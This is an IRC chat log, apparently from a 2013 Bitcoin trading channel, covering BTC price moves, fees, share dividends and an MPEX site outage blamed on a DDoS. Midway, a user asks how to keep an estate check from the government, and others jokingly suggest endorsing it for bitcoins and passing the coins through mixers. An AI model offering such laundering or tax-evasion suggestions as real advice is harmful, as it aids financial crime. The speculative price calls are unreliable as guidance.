can btc gain global traction if the blocksize limit is so small Mar 06 17:24:39 I am long term bullish Mar 06 17:25:02 but this is CLASSIC parabolic blow off top Mar 06 17:25:21 prove it Mar 06 17:25:28 classic as in the DOW? Mar 06 17:25:30 EskimoBob: doesn't s.dice pay a lot to miners through fees? Mar 06 17:25:33 sell 100% of your coins Mar 06 17:25:34 do itt Mar 06 17:25:35 nothing classic about bitcoin Mar 06 17:25:40 Or am I ill informed? Mar 06 17:25:41 well Mar 06 17:25:50 I'm putting my money where my mouth is here Mar 06 17:26:05 me too FAZ Mar 06 17:26:12 and BTC Mar 06 17:26:17 FAZ has way too much slippage Mar 06 17:26:20 will you eat your hat next week when price is 65? Mar 06 17:26:34 I will be VERY HAPPY if its $65 next week Mar 06 17:26:43 bug, buy puts as well Mar 06 17:26:44 lol Mar 06 17:27:03 Puts prices are being set at 43.57 right now! Mar 06 17:27:13 ;;bc,24hprc Mar 06 17:27:14 43.47 Mar 06 17:27:18 43.47 Mar 06 17:27:23 so NO don't buy puts Mar 06 17:27:34 if I sleep.. ill wake up to $50 Mar 06 17:27:35 calls make sense if you think it will stay here for more than 24 hours Mar 06 17:27:36 jeez Mar 06 17:27:47 1 BTC = 48.49800 U.S. dollars = 37.2116934 Euros Mar 06 17:28:08 EskimoBob: Ah so the fee rate won't adjust somehow and if someone wants to buy a coffee with BTC the fees will be bigger than the coffee? Mar 06 17:28:28 Just trying to grok all this, my head is spinning. Mar 06 17:29:00 unbalanced - buy low sell high - ignore everything else Mar 06 17:29:28 ACtually, the way things are trigger, it costs more in fees to buy a coffee than it does to buy a house Mar 06 17:29:35 triggered* Mar 06 17:29:46 small tx amounts require larger fees Mar 06 17:30:17 your $5 coffee will cost more in fees than a $50k car Mar 06 17:30:23 bitcoin is not for coffee Mar 06 17:30:33 that is why LTC :) Mar 06 17:30:34 Bugpowdrr: but currency Mar 06 17:30:34 its for shipments of coffee Mar 06 17:30:44 its not good for POS transactions Mar 06 17:30:53 but currency Mar 06 17:30:54 someone crash LTC please, I wanna buy in Mar 06 17:30:56 unless there is another frontend on it Mar 06 17:31:02 48.70 Mar 06 17:31:08 Chaang-Noi: did LTC resolve the blocksize/fees problem intelligently? if not, stfu Mar 06 17:31:35 jurov they can do a significant more than btc yeah Mar 06 17:31:36 Anyone have theories as to why this runup is so fast then? Is it driven by MPEX futures, or trader manipulation, or is this how the Fed kills BTC: it just buys them all? Mar 06 17:31:36 i'm willing to sell one bitcoin today for 50 bucks Mar 06 17:31:39 but only one Mar 06 17:31:45 plus, ltc is still at 0.6, thrashing the hdd like hell Mar 06 17:31:53 *version 0.6 Mar 06 17:32:03 unbalanced - Ashton Kutcher invested last week. Mar 06 17:32:04 i think the coinlab stuff, the amazon bitpay stuff, anme cheap, mega.. everything.... Mar 06 17:32:07 he's bigtime Mar 06 17:32:09 its all massive good news... Mar 06 17:32:31 what is "the amazon bitpay stuff"? Mar 06 17:32:50 pigeons http://www.fortmilltimes.com/2013/03/06/2538174/bitpay-integrates-bitcoin-with.html Mar 06 17:33:02 how is coinlab good news Mar 06 17:33:16 doctor_pullfinge: hence someone's reference to 12yo's investing above? Mar 06 17:33:20 its possibly good news Mar 06 17:33:25 possible disaster Mar 06 17:33:30 coinlabs making it so walls treat people can pour in 1 billion or whatever of other peoples money to "invest" Mar 06 17:33:30 how much is expected from ASICMINER per share this div? Mar 06 17:33:32 will people outside of us still have access to the coinlab usd market? Mar 06 17:33:44 yawn Mar 06 17:33:51 see you guys at 50 Mar 06 17:33:55 oyasumi. Mar 06 17:34:15 pigeons i dont know.. but we need more than mt gox/coin lab anyway, let wall street have that, we can do our own... Mar 06 17:34:17 holy shit fort mill times Mar 06 17:34:29 i lived there no one else uses bitcoin there Mar 06 17:34:36 :) Mar 06 17:34:38 yah bitpay news sounds big Mar 06 17:34:48 i guess no one knew about it but me? Mar 06 17:34:58 EskimoBob: it's a little less centrally controlled than usd tho Mar 06 17:35:06 but is it? Mar 06 17:35:15 eskimoob i heard your mugs are cool, can i see a photo? Mar 06 17:35:17 a handful of people make the rules that the rest of the network blindly follows Mar 06 17:35:18 yeah, clients have to approve a change too Mar 06 17:35:27 and clients are individuals Mar 06 17:35:30 most people run unmodified clients Mar 06 17:35:33 they are isheep Mar 06 17:35:43 lemmings Mar 06 17:35:48 48.80 Mar 06 17:35:49 well, i did say "a little" Mar 06 17:36:10 i mean, i can't really oppose changes to the USD Mar 06 17:36:17 someone at the fortmill times is a nerd Mar 06 17:36:39 but I can participate in a hard fork if things go sour Mar 06 17:36:46 you could use euros Mar 06 17:36:47 hi smickles Mar 06 17:36:49 that is pretty big ass news.. how did they only have it? Mar 06 17:36:51 i need an accountant Mar 06 17:37:00 specificalyy an estate accountant Mar 06 17:37:02 I have an accounting service Mar 06 17:37:06 eskimobob link to photos of your mugs? still ahve more to sell? Mar 06 17:37:12 i have a 24k check i want to keep Mar 06 17:37:19 and not deposit in abank Mar 06 17:37:29 how do i keep it for myself Mar 06 17:37:38 and not pay any to the government Mar 06 17:37:54 jcpham: sounds like you want a lawyer first Mar 06 17:38:01 fudge Mar 06 17:38:11 the check is made out to my dead grandmother's estate Mar 06 17:38:15 as an accountant in 'merica, i can't give legal advice Mar 06 17:38:17 you can't help me launder it? Mar 06 17:38:25 http://www.marketwatch.com/story/bitpay-integrates-bitcoin-with-fulfillment-by-amazoncom-2013-03-06 Mar 06 17:38:38 that was both rhetorical and a joke Mar 06 17:39:02 jcpham: who's the executor? Mar 06 17:39:07 me Mar 06 17:39:09 jcpham: if you are trying to launder money, why not endorse the check to someone for bitcoins Mar 06 17:39:18 BitPay's integration with Amazon currently works with WordPress.com, the world's most popular web publishing software, and WooCommerce, a comprehensive eCommerce platform for WordPress. Mar 06 17:40:00 send the coins through some mixers, and then buy wooden Austin,TX farmers market coins with the bitcoins Mar 06 17:40:06 jcpham - USD cash way better for laundering Mar 06 17:40:10 it's a fool-proof plan Mar 06 17:40:20 channel full of criminals Mar 06 17:40:21 i knew it Mar 06 17:40:25 :) Mar 06 17:40:33 asicminer pay out already, i need sleep:) Mar 06 17:40:49 EskimoBob: re: mpex has nothing to do with this, I didn't mean mpex's site issue today, I just meant does trading futures/options on mpex lead to more (less?) volatility in BTC? Mar 06 17:40:55 asicminer doesn't pay until Thursday Mar 06 17:40:58 its only Wednesday Mar 06 17:40:59 derp Mar 06 17:41:12 op says wednesday.... Mar 06 17:41:25 Wednesday is 24 hours long Mar 06 17:41:25 he never said he was going to change it... derp Mar 06 17:41:25 there was a test payment earlier Mar 06 17:41:32 not everyone is awake on your timezone Mar 06 17:41:36 wednesday in china is almost up... Mar 06 17:41:46 its 9:42 in the us tho Mar 06 17:42:01 14ish hours until its fully gone Mar 06 17:42:06 So were to set the bids for the crash? Mar 06 17:42:08 $36? Mar 06 17:42:23 36 seems fair Mar 06 17:42:29 and now the thread has 300 people all saying they got 1 satoshi/share Mar 06 17:42:33 lemmings! Mar 06 17:43:04 [HAVELOCK] [SDICE] 1 @ 0.44 BTC [+] Mar 06 17:43:15 if friedcat wants to pay on thursdays thats cool, but he should tell us:) Mar 06 17:43:20 and you're right, the last payment was 4 hours ago last week Mar 06 17:43:41 but considering not all the test payments have confirmed yet Mar 06 17:43:46 I doubt he'll send the full amount Mar 06 17:43:47 lol Mar 06 17:43:55 he did not wait last time Mar 06 17:44:06 yes he did Mar 06 17:44:06 he cant wait, somepeople wont ever confirm Mar 06 17:44:11 they ere 5 hours apart Mar 06 17:44:15 49! Mar 06 17:44:17 confirmed by the blockchain twit Mar 06 17:44:24 not by some lemming on the forum Mar 06 17:44:35 he waited some time, he did not wait for 100% of people to confirm Mar 06 17:44:44 < imsaguy> Wednesday is 24 hours long << or 28, depending on how you count timezones Mar 06 17:44:46 I didn't say he waited for people to confirm Mar 06 17:44:54 I said he waited for the blockchain to confirm Mar 06 17:45:00 okay, im multi tasking, calm down Mar 06 17:45:07 ok twit Mar 06 17:45:14 classy... Mar 06 17:45:19 ;;asks 49 Mar 06 17:45:19 There are currently 420.09147 bitcoins offered at or under 49.0 USD, worth 20573.7459579 USD in total. | Data vintage: 93.0439 seconds Mar 06 17:45:55 were rich Mar 06 17:46:17 i haz 5 btc! fuck yeah! Mar 06 17:46:26 ;;ticker Mar 06 17:46:28 BTCUSD ticker | Best bid: 48.90000, Best ask: 48.99000, Bid-ask spread: 0.09000, Last trade: 48.90000, 24 hour volume: 98725.47056383, 24 hour low: 39.00000, 24 hour high: 49.00000, 24 hour vwap: 43.52904 Mar 06 17:47:05 ;;goxlag Mar 06 17:47:08 176.105766 seconds Mar 06 17:48:07 49.1 Mar 06 17:48:15 drink! Mar 06 17:48:27 where's apex anyone have news on site being down? Mar 06 17:48:30 mpex Mar 06 17:48:38 ;;asks 50 Mar 06 17:48:38 There are currently 8385.6763 bitcoins offered at or under 50.0 USD, worth 416077.619858 USD in total. | Data vintage: 71.0702 seconds Mar 06 17:49:44 doctor_pullfinge: weren't you here for that discussion? Mar 06 17:50:11 I was not - not looking for a book, just has mp acknowledged anything Mar 06 17:50:35 it's either that mircea's sex dungeon prisoners finally revolted, or use mpex.coinbr.com while mpex.co is down Mar 06 17:51:33 mpex.coinbr.com is one of many proxies to the mpex backend, and since all you send is encrypted, it doesn't matter that you are sending info thru a third party Mar 06 17:51:47 Most Online Today: 1541. Most Online Ever: 3809 we have a long way to go :) Mar 06 17:52:36 so, mp is sleeping. I'm not looking to make a trade, just worried about another pirate40 situation. Mar 06 17:52:58 you should be, now'd be a good time to disappear. Mar 06 17:53:05 but he has no need to. Mar 06 17:53:08 smickles: good point (tz) Mar 06 17:54:07 is coiner able to send trades through to the backend? I have a seat on the back end and STAT don't works Mar 06 17:54:08 blu3gr1ffon: thing is, as long as the traders keep s.mpoe worth more than he would get by running with the money, he has a financial interest to stay Mar 06 17:54:17 coinbr Mar 06 17:54:27 ;;asks 49.999 Mar 06 17:54:30 There are currently 6264.6484 bitcoins offered at or under 49.999 USD, worth 310249.908414 USD in total. | Data vintage: 72.1208 seconds Mar 06 17:55:10 did anyone see his post recently about thinking of retirement? Mar 06 17:55:12 eeeo Mar 06 17:55:22 doctor_pullfinge: my stats are working tru mpex.coinbr.com Mar 06 17:55:33 *thru Mar 06 17:56:19 smickles - thanks - I feel better. Back to worrying about why s.dice is tanking. Mar 06 17:56:26 http://blockchain.info/ last two blocks... ooopsss Mar 06 17:56:30 and what do you mean 'a seat on the backend', if you have a connection to the backend which isn't a proxy, why are you worried about the other proxies? Mar 06 17:56:40 people sick of s.dice? Mar 06 17:56:51 div was smaller Mar 06 17:57:21 I paid the 30 btc for a seat directly on mpex. coin.br is a passthrough, so may be cacheing the info. Mar 06 17:57:52 i bought my sdice at or below 0.0044 Mar 06 17:57:56 doctor_pullfinge: i think you are a little confused here Mar 06 17:57:58 so im not that worried about it yet Mar 06 17:58:20 I think the div was bigger in terms of USD, but mainly I think people spend x% of their USD based paycheck on s.dice. So, BTC dividend amount goes down Mar 06 17:58:29 when price of btc goes up Mar 06 17:58:35 coinbr is a broker (passthru, whatever) mpex.coinbr.com is a proxy to the backend system which is mpex Mar 06 17:58:39 besides, JAH is a better deal atm. daily divs at 10% or something, plus compounded earnings from reinvestment Mar 06 17:58:51 yeah the jah shares are crazy Ukto Mar 06 17:58:57 you can send a STATJSON or whatever you want through that proxy Mar 06 17:59:05 seems to be better than ASICMINER atm Mar 06 17:59:06 as if you sent it to mpex.co Mar 06 17:59:08 thanks smickles. you cleared it up for me Mar 06 17:59:15 glad to help :) Mar 06 17:59:20 JAH got asics or what Mar 06 17:59:25 i think by 30 days of jah its like a 15%+ monthly profit Mar 06 17:59:27 yeah he got asicminer shares Mar 06 17:59:33 a Mar 06 17:59:48 well worth over the .3 Mar 06 17:59:52 random off-topic idea, skype and facebook should show squiggly underlines on mispelled words, could teach the masses so easily Mar 06 18:00:13 that's why div so good Mar 06 18:00:26 ThickAsThieves: that's more of an OS issue, isn't it? Mar 06 18:00:51 ThickAsThieves: I mean, nearly all text input fields on my compy do spelling correction Mar 06 18:01:21 facebook does? Mar 06 18:01:27 skype does? Mar 06 18:02:08 oh, Mar 06 18:02:12 i mean on the output Mar 06 18:02:13 btw, 6,345 asicminer shares confirmed by fridcat on G.ASICMINER-PT now Mar 06 18:02:20 so everyone can see Mar 06 18:02:37 doctor_pullfinge, since pgp is used,coinbr has no way to tamper with your orders nor replies Mar 06 18:02:44 6k wow Mar 06 18:02:57 thats just the confirmed Mar 06 18:03:02 and as for caching, make sure to check signature date so it's aways different Mar 06 18:03:06 not including alot more pending in transit Mar 06 18:03:09 for example Mar 06 18:03:15 yeah just recently Mar 06 18:03:18 really boring Mar 06 18:03:26 you dont play it for fun Mar 06 18:03:28 you play it for odds Mar 06 18:03:39 I just went to coinbr and don't see any "last update" information. So I still think that could just be the last time that mpex was up. Mar 06 18:03:46 1.9 edge is nothing Mar 06 18:03:56 so it's good for a gambler to pay there Mar 06 18:04:00 ceasssh Mar 06 18:04:01 even if it's boring Mar 06 18:04:23 coinbr != mpex.coinbr Mar 06 18:04:28 I'm sending larger txn fees in the future. Mar 06 18:04:45 i might sell off some dice and buy up some jah instead Mar 06 18:04:46 EskimoBob: how long of a history? Mar 06 18:04:48 what's a good fee these days for sub 10 minute 6 confirmations? Mar 06 18:04:53 increase teh divs Mar 06 18:05:35 doctor_pullfinge, since mpex didn't issue any statement, we don't have anything for an update Mar 06 18:06:00 EskimoBob: i don't think anyone who is recording that info has mad it public Mar 06 18:06:14 coinbr just runs the proxy alongside our broker interface Mar 06 18:06:23 ;;ticker Mar 06 18:06:25 BTCUSD ticker | Best bid: 48.71000, Best ask: 48.71350, Bid-ask spread: 0.00350, Last trade: 48.71000, 24 hour volume: 98576.32628072, 24 hour low: 39.00000, 24 hour high: 49.09900, 24 hour vwap: 43.71889 Mar 06 18:06:32 in fact is not hacked, you can make order Mar 06 18:06:43 ;;goxlag Mar 06 18:06:45 353.26605 seconds Mar 06 18:07:28 jurov - is the mpex back end down and mp not around? Mar 06 18:08:39 http://imgur.com/JHhGmR0 Mar 06 18:08:46 what mpex looks like to me currently Mar 06 18:09:01 doctor_pullfinge i don't know anything about mp... except he does have irc client opened, that's a good sign perhaps Mar 06 18:09:03 (well, moments ago, anyway) Mar 06 18:09:29 getting goxxed Mar 06 18:09:36 order pending for 5 minutes Mar 06 18:09:47 ;;goxlag Mar 06 18:09:48 342.802364 seconds Mar 06 18:09:50 but that's a pass-through page that might be cached from last night. Mar 06 18:09:52 not that bad :P Mar 06 18:10:27 I agree this is not freak out time. I'm trying to understand what this mpex.coinbr.com thing really is. Mar 06 18:10:27 doctor_pullfinge: not the thing that I screenshotted Mar 06 18:10:32 doctor_pullfinge, scroll back to last trade by assbot, compare to the site Mar 06 18:10:44 Bugpowdrr: wait another 5 min, see if it goes through Mar 06 18:10:44 :P Mar 06 18:10:51 that goxlag is thick Mar 06 18:10:54 ;;ticker Mar 06 18:10:56 BTCUSD ticker | Best bid: 48.58643, Best ask: 48.70000, Bid-ask spread: 0.11357, Last trade: 48.90000, 24 hour volume: 97948.57311533, 24 hour low: 39.00000, 24 hour high: 49.09900, 24 hour vwap: 43.75867 Mar 06 18:10:56 doctor_pullfinge: it is pretty much a replication of mpex.co Mar 06 18:10:58 only over 5min Mar 06 18:10:58 lol. Mar 06 18:11:00 doctor_pullfinge it's a proxy that we sewt up after last ddos Mar 06 18:11:01 the mpex frontend Mar 06 18:11:12 and there are other proxies too Mar 06 18:11:13 ;;ticker Mar 06 18:11:15 BTCUSD ticker | Best bid: 48.58643, Best ask: 48.70000, Bid-ask spread: 0.11357, Last trade: 48.70000, 24 hour volume: 97945.57336925, 24 hour low: 39.00000, 24 hour high: 49.09900, 24 hour vwap: 43.75887 Mar 06 18:11:24 !ticker m ^OIX Mar 06 18:11:33 >:( Mar 06 18:11:39 and "proxy" does not equal "passthrough" Mar 06 18:11:48 I prepared your canoe with cedar boughs. Mar 06 18:11:53 ;;market sell 10000 Mar 06 18:11:54 A market order to sell 10000 bitcoins right now would net 453945.1459 USD and would take the last price down to 43.3310 USD, resulting in an average price of 45.3945 USD/BTC. | Data vintage: 106.9176 seconds Mar 06 18:12:05 on CNN http://money.cnn.com/2013/03/06/technology/innovation/bitcoin/ Mar 06 18:12:10 ;;market sell 100000 Mar 06 18:12:11 thestringpuller: 7day OIX : Mar 06 18:12:11 47.45 (50.15 / 29.08) Mar 06 18:12:12 13`996.17 (87.2 / 12.8) Mar 06 18:12:17 A market order to sell 100000 bitcoins right now would net 2998627.3527 USD and would take the last price down to 16.0100 USD, resulting in an average price of 29.9863 USD/BTC. | Data vintage: 0.0098 seconds Mar 06 18:12:39 ;;market sell 1000000 Mar 06 18:12:40 A market order to sell 1000000 bitcoins right now would net 4312499.9219 USD and would take the last price down to 0.0100 USD, resulting in an average price of 4.3125 USD/BTC. | Data vintage: 23.1310 seconds Mar 06 18:12:54 still pending Mar 06 18:12:56 1 BTC = 48.71000 U.S. dollars = 37.3743574 Euros Mar 06 18:13:00 fuck it Mar 06 18:13:01 whatever Mar 06 18:13:03 [HAVELOCK] [SDICE] 6 @ 0.45 = 2.7 BTC [+] Mar 06 18:13:08 cnn will drag in more bidders Mar 06 18:13:34 cnn? Mar 06 18:13:59 oooh Mar 06 18:14:18 why is this cyber currency trading at an all time high? Mar 06 18:14:24 pleas tell me steve hargreaves Mar 06 18:14:29 doing test buy order for 123 S.DICE... Mar 06 18:14:44 ask is up! Mar 06 18:14:44 [MPEX] [S.DICE] 123 @ 0.0045 = 0.5535 BTC [+] Mar 06 18:15:04 so, all is working except mpex.co website Mar 06 18:15:17 smiclkles, you have to finish your taxreturn ? Mar 06 18:15:17 jurov: but will doctor_pullfingr believe that assbot gets data from a reliable source? Mar 06 18:16:12 smickles, doctor_pullfingr should pull fingers out of his ass and try it himself Mar 06 18:16:48 doctor_pullfingr just needs a timestamp not a big deal. I can see the site, but assbot only shows HAVELOCK trades. Mar 06 18:16:50 pardon the pun Mar 06 18:18:07 doctor_pullfingr so you did a mpex trade like i just did and assbot did not show it? Mar 06 18:18:21 nor http://mpex.coinbr.com/?mpsic= did? Mar 06 18:18:32 it shows most recent trade in title Mar 06 18:18:33 i saw assbot show it Mar 06 18:19:14 16:14 <@assbot> [MPEX] [S.DICE] 123 @ 0.0045 = 0.5535 BTC [+] Mar 06 18:19:36 which came shortly after "16:14 < jurov> doing test buy order for 123 S.DICE..." Mar 06 18:19:46 sorry jurov - I see the assbot trade and the timestamp. I'll shut my mouth now and get to work. Fluorescent lighting awaits. Mar 06 18:19:58 no problem ;) Mar 06 18:20:43 this is the top Mar 06 18:20:50 again? Mar 06 18:20:57 "The U.S. dollar is an obvious Ponzi scheme," said Thomas, who thinks the U.S. government has too much debt to raise interest rates high enough to defend the dollar if there were ever a run on it. With Bitcoin, "you feel like you're in control of your money." Mar 06 18:20:59 darn Mar 06 18:21:05 gox was to sow Mar 06 18:21:05 last paragraph of that CNN article wins Mar 06 18:21:15 slow Mar 06 18:21:22 jcpham: i was just about to quote that too Mar 06 18:21:27 http://money.cnn.com/2013/03/06/technology/innovation/bitcoin/ Mar 06 18:21:34 it's nice Mar 06 18:21:39 to see it so bluntly Mar 06 18:21:40 ;;goxlag Mar 06 18:21:42 310.220931 seconds Mar 06 18:21:47 god damn Mar 06 18:21:56 missed the top Mar 06 18:22:00 me too Mar 06 18:22:03 too slow to change the order now Mar 06 18:22:07 Bugpowdrr: at least they arn't running a CS server Mar 06 18:22:56 they are running a site that is trading $5MM in currency a day Mar 06 18:23:15 srsly, get the servers together, have peak resources Mar 06 18:23:17 this is stupid Mar 06 18:25:38 [MPEX] [S.MPOE] 12250 @ 0.00070427 = 8.6273 BTC [+] Mar 06 18:25:40 [MPEX] [S.MPOE] 1326 @ 0.0007105 = 0.9421 BTC [+] Mar 06 18:32:32 that cnn article is a little retarded Mar 06 18:32:58 "Because the number of transactions and overall value of coins in circulation is relatively low, the currency is quite volatile -- it went from under $1 to over $28, then back to $7 in 2011 alone." Mar 06 18:33:24 one event means volatility in 2013? Mar 06 18:33:28 tanking Mar 06 18:33:50 ;;ticker Mar 06 18:33:52 BTCUSD ticker | Best bid: 47.35100, Best ask: 48.00000, Bid-ask spread: 0.64900, Last trade: 47.35100, 24 hour volume: 97534.97841476, 24 hour low: 39.00000, 24 hour high: 49.09900, 24 hour vwap: 43.87966 Mar 06 18:34:12 ;;goxlag Mar 06 18:34:14 690.899964 seconds Mar 06 18:34:17 ugh Mar 06 18:34:26 prepare for tankage Mar 06 18:36:43 dafuq 45 minutes only at 5 confirmations, with .005 fee Mar 06 18:37:13 deadweasel: the fee will only affect when it gets conf 1 Mar 06 18:37:23 when those confirmations go thru, price is gonna drop Mar 06 18:38:36 [MPEX] [S.DICE] 189 @ 0.0045 = 0.8505 BTC [+] Mar 06 18:39:38 why did I sell at 48 insteady of 47.99? why Mar 06 18:39:39 smickles: I did not know that. Mar 06 18:39:58 smickles: thank you Mar 06 18:40:52 ThickAsThieves: the example is a bad analogy, sure Mar 06 18:40:58 give it time, there will be another tanking Mar 06 18:41:24 yesssss Mar 06 18:41:25 getting filled Mar 06 18:41:26 how much of the tx volume today is the same coins being sent over and over? Mar 06 18:41:41 "Mt. Gox found its operations hindered by its lack of proximity to the tech sector." lol now that's an excuse Mar 06 18:41:54 [MPEX] [S.MPOE] 2600 @ 0.00072389 = 1.8821 BTC [+] Mar 06 18:42:12 mtgox was a hackjob originally trading magic cards Mar 06 18:42:21 they always leave that part out Mar 06 18:42:36 Magix; The Gatherings, online exchange Mar 06 18:42:55 I fireballed your leviathan Mar 06 18:43:00 1 BTC = 47.75000 U.S. dollars = 36.6377657 Euros Mar 06 18:43:09 i should ask mp about his "proximity to the tech sector" Mar 06 18:43:28 or evoorhees Mar 06 18:43:46 or eskimobob lmao Mar 06 18:43:51 I'm sure mp is fairly proximal to the tech 'sector' right now ;) Mar 06 18:44:21 hi all. Mar 06 18:44:33 if you're having trouble loading trilema, please flush your dns. Mar 06 18:44:49 yay Mar 06 18:44:50 and otherwise, mpex,co is being ddosed by someone too stupid to know that doesn't work. Mar 06 18:44:56 i never load it no problem Mar 06 18:44:58 use the various proxies, such as Mar 06 18:45:07 :) Mar 06 18:45:17 hi mp Mar 06 18:45:28 damn, i thought your sexdungeon revolted Mar 06 18:45:33 smickles! Mar 06 18:45:50 mod6: hiya, sorry for being away Mar 06 18:46:00 hug? \o/ Mar 06 18:46:17 smickles: \0/ Mar 06 18:46:28 aww Mar 06 18:46:35 mpex.5gbfree.com mpex.host56.com mpex.coinbr.com etc Mar 06 18:46:49 whoa smickles in da house ?! Mar 06 18:46:51 when did you get out ? Mar 06 18:46:55 mircea_popescu: load up a free instance of amazon? Mar 06 18:46:56 smickles: glad u stopped back in. :) Mar 06 18:47:07 mircea_popescu: earlier today Mar 06 18:47:19 imsaguy yeah, i got a few of those too Mar 06 18:47:22 5gbfree dont work Mar 06 18:47:25 bah.. its "mod6" -- gotta reauth Mar 06 18:47:45 Guest60737: you know about /ns release, right? Mar 06 18:47:45 lol, EskimoBob, you troll https://bitcointalk.org/index.php?topic=101902.msg1590968#msg1590968 Mar 06 18:47:48 smickles so is it a boy or a girl ? Mar 06 18:48:07 mircea_popescu: tabloids say girl ;) Mar 06 18:48:10 mircea_popescu: heh, well, it's a boy, and he is expected to come mid may Mar 06 18:48:11 it's a bitbaby Mar 06 18:48:36 FILLED Mar 06 18:48:37 o Mar 06 18:48:41 i thought you got in early. Mar 06 18:48:50 imsaguy: ya. working on those things now with ns & grib Mar 06 18:49:06 ;;seen anduck Mar 06 18:49:07 anduck was last seen in #bitcoin-assets 1 day, 20 hours, 24 minutes, and 36 seconds ago: uhh Mar 06 18:49:22 oh, anduck said I was supposed to hold his coins Mar 06 18:49:22 also http://pastebin.com/xfSBf759 Mar 06 18:49:27 for future records Mar 06 18:49:30 he said I could have them forever Mar 06 18:50:18 nothing from asicminer yet, hmm Mar 06 18:51:11 scammertag! Mar 06 18:51:14 ;;tslb Mar 06 18:51:18 Time since last block: 7 minutes and 46 seconds Mar 06 18:51:30 for the bears: http://seekingalpha.com/instablog/7761841-patrik-korda/1616371-bitcoin-bubble-2-0 Mar 06 18:51:32 their test tx still hasn't confirmed Mar 06 18:52:01 yeah, why would they need to wait though? Mar 06 18:52:02 just goes to show that sending a bunch of microdust without paying a respectible fee is silly Mar 06 18:52:04 imsaguy: lol Mar 06 18:52:48 estimated btc transacted: .00023055 Mar 06 18:52:50 ;;later tell anduck pm or email me when you get a chance Mar 06 18:52:50 The operation succeeded. Mar 06 18:52:57 fees: .0005 Mar 06 18:53:56 asicminer full payment just hit Mar 06 18:54:14 just got it Mar 06 18:54:18 (08:48) < smickles> mircea_popescu: heh, well, it's a boy, and he is expected to come mid may << Nice! It's getting closer. :] Mar 06 18:54:21 yay Mar 06 18:54:24 dividend received Mar 06 18:54:28 less than the first Mar 06 18:54:39 as expected :) Mar 06 18:54:58 i bought more shares so got more:) Mar 06 18:55:08 im going to try and guess and see their mining rate... Mar 06 18:55:17 that doesn't make the dividend per share go up Mar 06 18:55:18 mod6: indeed, and the first one is starting to walk around Mar 06 18:55:36 also everyone's deposits/withdrawals flushed. Mar 06 18:55:58 smickles: thats awesome man. :) Mar 06 18:56:02 The myopic are extrapolating the price trend of the past three months, which they deem is normal, and in so doing they exacerbate it to the upside, thus attracting even greater fools. The inflection point will come when the continuity of bullish thought is broken, which could be anywhere between $49/bc to $69/bc. One thing is for sure, the amount of suckers left who are willing to jump on the moving and ever accelerating train is drawing thin, Mar 06 18:56:03 and so are their pockets. Mar 06 18:56:20 jcpham ftr the oix totally called the 50. Mar 06 18:56:53 0.01916298 per share Mar 06 18:57:17 jcpham: where'd you copy and paste that from? Mar 06 18:57:24 didnt i say top was 69? Mar 06 18:57:32 so now they're up to .06/share Mar 06 18:57:32 http://seekingalpha.com/instablog/7761841-patrik-korda/1616371-bitcoin-bubble-2-0 Mar 06 18:57:35 3832.596 paid out... Mar 06 18:57:37 LONG READ Mar 06 18:57:45 bring a lunch Mar 06 18:57:53 once it hits .1, divs will halve Mar 06 18:58:25 mircea_popescu dunno where would the oix be if calls were available throughout Mar 06 18:58:41 jurov thing is a certain strike can't push it past a certain level Mar 06 18:58:43 okay so they ahve about 15% of the weekly coins... Mar 06 18:58:43 you know what i mean ? Mar 06 18:59:23 36th x .15 = about 5.4 Mar 06 18:59:39 hmmm... about expected, i guess tehy are not solomining Mar 06 19:00:19 imsaguy less tha halve, 20% or so will aslo be collected for new hardware Mar 06 19:01:05 so we will get like 40% of what they mine... Mar 06 19:01:37 imsaguy how did you get .06 per share? Mar 06 19:02:05 buying more asics means more coins... and a company worth more.. cant just look at dividends Mar 06 19:03:03 the first dividend was like .03x Mar 06 19:03:07 PsycoticBoy if we take the 40% of todays dividends and x 52 we get .416 pretty damn solid Mar 06 19:03:07 http://www.google.com/trends/explore#q=bitcoin%2C%20mainstream&cmpt=q Mar 06 19:03:08 the second was .02x Mar 06 19:03:11 I rounded Mar 06 19:03:14 ;;ticker Mar 06 19:03:15 ok Mar 06 19:03:16 BTCUSD ticker | Best bid: 47.61000, Best ask: 47.70000, Bid-ask spread: 0.09000, Last trade: 47.77175, 24 hour volume: 99687.93083192, 24 hour low: 39.00000, 24 hour high: 49.09900, 24 hour vwap: 43.99952 Mar 06 19:03:38 look, there is a corelated rise of "mainstream" with the recent rise in "bitcoin" Mar 06 19:03:42 i think first was .2x and second .19x Mar 06 19:04:22 i see this stock being worth .5 easy, and much much more if bfl fail Mar 06 19:05:00 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.21046328 = 210.4633 BTC [+] Mar 06 19:06:21 http://www.google.com/trends/explore#q=bitcoin&date=today%201-m&cmpt=q lol at related terms Mar 06 19:07:22 lol "bitcoin bitcoin bitcoin" Mar 06 19:08:27 so how's the drama today ? Mar 06 19:08:35 drama? Mar 06 19:08:42 it's waiting Mar 06 19:09:15 it's about to fall any minute purportedly Mar 06 19:09:19 a ok Mar 06 19:09:58 what are you guys talking about? Mar 06 19:10:05 mp: thanks for getting http://mpex.5gbfree.com/ up so quick Mar 06 19:10:12 Mar 06 07:58:51 o hey, it occurs to me, this is the right time to get hacked right ? Mar 06 19:10:16 le lol. Mar 06 19:10:29 mod6 it was up from before tho Mar 06 19:10:37 oh and how is your proximity to the tech sector today, mircea? Mar 06 19:10:38 i did nuffin Mar 06 19:10:40 ah! didn't know that Mar 06 19:10:57 mod6 was a ddos back in jan, set up the entire proxy structure then. that's when jurov made his, i think smickles has one too Mar 06 19:10:59 buncha them Mar 06 19:11:02 ;;goxlag Mar 06 19:11:03 75.495775 seconds Mar 06 19:11:04 jurov my who ?! Mar 06 19:11:11 apparently i pasted a one liner in -otc and stopped someone from dropping 50k from a BoA from their cell phone on bitcoin Mar 06 19:11:19 o rly ? cool. Mar 06 19:11:24 mircea_popescu: it's the only thing i remembered from http://money.cnn.com/2013/03/06/technology/innovation/bitcoin/ Mar 06 19:11:27 im just grepping this log for "hacked" atm, it's loads of fun Mar 06 19:11:41 "Rising asset prices create euphoria, and euphoria significantly drops the IQ of the participants." Mar 06 19:11:47 liek Mar 06 16:13:53 i can't get the only service that has never been hacked to come up Mar 06 19:12:01 jcpham i dunno about that. euphoria makes me sharper. Mar 06 19:12:14 i'm pretty sharp Mar 06 19:12:18 pissed off or happy Mar 06 19:12:19 you're like a cheddar Mar 06 19:12:36 It's mpex working? Mar 06 19:12:45 i wouldnt call it work Mar 06 19:12:47 :) Mar 06 19:12:49 Chilca it's always been working! Mar 06 19:13:25 mircea_popescu: maybe is something wrong in my notebook Mar 06 19:13:40 mircea_popescu: is mpex down? Mar 06 19:13:51 Chilca there's a pretty dumb ddos going on 